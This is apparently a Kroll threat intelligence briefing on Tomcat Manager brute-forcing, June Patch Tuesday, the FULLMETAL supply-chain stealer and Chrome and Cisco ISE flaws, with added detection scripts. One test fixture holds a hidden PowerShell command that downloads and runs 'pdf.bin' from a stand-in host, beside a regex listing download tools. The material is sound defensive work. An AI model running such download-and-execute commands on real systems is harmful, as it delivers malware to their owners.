June 16, 2025 Cyber Threat Intelligence Briefing

Jun 16, 2025

This week’s briefing covers:

00:00 - Intro and Situational Awareness

Brute-Force Attack Against Apache Tomcat Manager
GreyNoise recently observed a coordinated spike in malicious activity against Apache Tomcat Manager interfaces. On June 5, 2025, GreyNoise registered login attempts against Tomcat Manager at volumes well above baseline, indicating a deliberate attempt to identify and gain access to exposed Tomcat services at scale.
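One practical response to this item is to look for the same pattern in your own Tomcat access logs. The script below is an added example, not GreyNoise's or Kroll's code, and assumes Tomcat's default AccessLogValve pattern (%h %l %u %t "%r" %s %b); the log lines are constructed for the demo. It flags any source IP that produces a burst of 401/403 responses against /manager/ within a short window, and separately notes whether that IP later received a 200 from the Manager app, which is the signal that a guessed credential worked.

```python
"""Flag brute-force activity against the Tomcat Manager app in access logs.

Added example (not from the briefing). Assumes the default AccessLogValve
pattern: %h %l %u %t "%r" %s %b. Sample log lines below are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# One line of the default Tomcat access log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+)$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"   # e.g. 05/Jun/2025:10:15:01 +0000


def parse_line(line):
    """Return a dict for a well-formed access-log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def detect_manager_bruteforce(lines, threshold=5, window=timedelta(minutes=5)):
    """Return {ip: {...}} for IPs with >= threshold auth failures on /manager/
    inside any `window`. Tomcat Manager answers failed Basic auth with 401;
    403 covers role or RemoteAddrValve denials and is counted too."""
    events = defaultdict(list)           # ip -> [(ts, status), ...]
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith("/manager/"):
            continue
        events[rec["ip"]].append((rec["ts"], rec["status"]))

    findings = {}
    for ip, evs in events.items():
        evs.sort()
        fails = [ts for ts, st in evs if st in (401, 403)]
        # Largest number of failures that fit in one sliding window.
        best, j = 0, 0
        for i, ts in enumerate(fails):
            while ts - fails[j] > window:
                j += 1
            best = max(best, i - j + 1)
        if best < threshold:
            continue
        # A 200 from the Manager app after the threshold-th failure suggests
        # the guessing succeeded and warrants an incident, not just a block.
        cutoff = fails[threshold - 1]
        success = any(st == 200 and ts >= cutoff for ts, st in evs)
        findings[ip] = {"failures": len(fails), "max_burst": best,
                        "success_after_burst": success}
    return findings


# Constructed sample: one attacker, one low-volume prober, one normal visitor.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Jun/2025:10:15:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.5 - - [05/Jun/2025:10:15:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.5 - - [05/Jun/2025:10:15:04 +0000] "GET /manager/html HTTP/1.1" 401 2473
198.51.100.7 - - [05/Jun/2025:10:15:30 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.5 - - [05/Jun/2025:10:15:07 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.5 - - [05/Jun/2025:10:15:09 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.5 - - [05/Jun/2025:10:15:12 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.5 - admin [05/Jun/2025:10:15:15 +0000] "GET /manager/html HTTP/1.1" 200 18543
192.0.2.9 - - [05/Jun/2025:10:16:00 +0000] "GET /index.html HTTP/1.1" 200 11156
198.51.100.7 - - [05/Jun/2025:10:17:30 +0000] "GET /manager/text/list HTTP/1.1" 401 2473
this line is deliberately malformed and is skipped
"""

if __name__ == "__main__":
    for ip, info in detect_manager_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(ip, info)
```

The threshold and window are tuning knobs; a real Manager interface that nobody should be reaching from the internet can use a much lower threshold, and the cleaner fix is to not expose /manager/ at all, or to restrict it with a RemoteAddrValve.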

02:05 [PATCHING] Microsoft Patch Tuesday Addresses 70 Issues, 1 Zero-Day
Microsoft has fixed 70 vulnerabilities in June's patch cycle, including the Chromium-based Microsoft Edge releases.
The patches address:

  • Elevation of Privilege Vulnerabilities: 14
  • Security Feature Bypass Vulnerabilities: 3
  • Remote Code Execution Vulnerabilities: 26
  • Information Disclosure Vulnerabilities: 17
  • Denial of Service Vulnerabilities: 6
  • Spoofing Vulnerabilities: 2
  • Edge - Chromium Vulnerabilities: 2

06:40 [MALWARE SPOTLIGHT] FULLMETAL
Since April 2025, Kroll has been tracking a large wave of malicious activity linked to a suspected supply chain attack on the "PDFast" software. In this campaign, a malicious update is executed via a scheduled task named "updater". That task downloads a file named "pdf.bin" and executes it, which produced detections for malicious activity and behaviors consistent with information stealers.
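The two concrete indicators in this item, a scheduled task named "updater" and a payload file "pdf.bin", are enough to hunt on. The script below is an added example, not Kroll's tooling, and works on Task Scheduler XML definitions (the files under C:\Windows\System32\Tasks, or the TaskContent field of Security event 4698). The task documents are constructed for the demo, and the generic download-cmdlet pattern is an assumption layered on top of the page's indicators, not something the briefing reports.

```python
"""Hunt Task Scheduler XML for a FULLMETAL-style 'updater' task.

Added example (not Kroll's code). Indicators from the briefing: task name
"updater" and payload "pdf.bin". The download-tell regex is an assumption.
On-disk task files are UTF-16 with a BOM: read them as bytes and pass the
bytes to analyse_task(); ET handles the encoding declaration.
"""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SUSPECT_NAMES = {"updater"}          # from the briefing
SUSPECT_FILES = ("pdf.bin",)         # from the briefing
# Common download-and-run tells in task actions (assumption, not from the page).
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|downloadfile|downloadstring|\biwr\b|\bcurl\b|"
    r"certutil.*-urlcache|bitsadmin", re.I)


def analyse_task(xml_doc):
    """Return {"name": task name, "findings": [reasons]} for one task XML."""
    root = ET.fromstring(xml_doc)
    uri = root.findtext("t:RegistrationInfo/t:URI", default="", namespaces=NS)
    name = uri.rsplit("\\", 1)[-1]
    findings = []
    if name.lower() in SUSPECT_NAMES:
        findings.append(f"task name '{name}' matches FULLMETAL indicator")
    for ex in root.findall("t:Actions/t:Exec", NS):
        cmd = ex.findtext("t:Command", default="", namespaces=NS)
        args = ex.findtext("t:Arguments", default="", namespaces=NS)
        action = f"{cmd} {args}".strip()
        if any(f in action.lower() for f in SUSPECT_FILES):
            findings.append(f"action references payload file: {action}")
        if DOWNLOAD_RE.search(action):
            findings.append(f"action downloads content: {action}")
    return {"name": name, "findings": findings}


def hunt(task_docs):
    """Return only the tasks that produced at least one finding."""
    return [r for r in map(analyse_task, task_docs) if r["findings"]]


# Constructed sample: a task shaped like the one described in the briefing.
MALICIOUS_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\updater</URI></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-w hidden -c "Invoke-WebRequest https://example.invalid/pdf.bin -OutFile $env:TEMP\pdf.bin; Start-Process $env:TEMP\pdf.bin"</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed sample: an ordinary built-in task for contrast.
BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Microsoft\Windows\Defrag\ScheduledDefrag</URI></RegistrationInfo>
  <Actions Context="Author">
    <Exec>
      <Command>%windir%\system32\defrag.exe</Command>
      <Arguments>-c -h -o -$</Arguments>
    </Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    for hit in hunt([MALICIOUS_TASK, BENIGN_TASK]):
        print(hit["name"])
        for reason in hit["findings"]:
            print("  -", reason)
```

The name and file matches are the high-confidence signals; the download-cmdlet match on its own will also fire on legitimate updaters, so treat it as context for the other two rather than as a standalone alert.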

09:47 [VULNERABILITY] Critical Vulnerability in Google Chrome
An out-of-bounds read and write in the V8 JavaScript engine in Google Chrome prior to 137.0.7151.68 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. Google's advisory indicates that attackers are actively exploiting the flaw against users who visit compromised sites, and the vulnerability has since been added to the CISA KEV catalog.

11:27 [VULNERABILITY] CVE-2025-20286 Affecting Cisco Identity Services Engine
A vulnerability in Amazon Web Services (AWS), Microsoft Azure and Oracle Cloud Infrastructure (OCI) cloud deployments of Cisco Identity Services Engine (ISE) has been assigned a critical CVSS score of 9.9. It could allow an unauthenticated, remote attacker to access sensitive data, execute limited administrative operations, modify system configurations, or disrupt services on affected systems.

Dive deeper:

Kroll’s Monthly Threat Intelligence Spotlight Report: https://www.kroll.com/en/insights/publications/cyber/threat-intelligence-reports/cti-spotlight-trends-report

Kroll’s Q3 2024 Threat Landscape Report: https://www.kroll.com/en/insights/publications/cyber/threat-intelligence-reports/q3-2023-threat-landscape-report-social-engineering

Playlist of Kroll's Weekly Cyber Threat Intelligence Briefings: Cyber Threat Intelligence Briefings

Kroll Cyber Blog: https://www.kroll.com/en/insights/publications/cyber

Kroll Cyber Threat Intelligence: https://www.kroll.com/en/services/cyber-risk/managed-security/threat-intelligence-services

Kroll Threat Intelligence Reports: https://www.kroll.com/en/insights/publications/cyber/threat-intelligence-reports

Kroll Responder MDR: https://www.kroll.com/en/services/cyber-risk/managed-security/kroll-responder

#krollcyber #threatintelligence #cyberthreats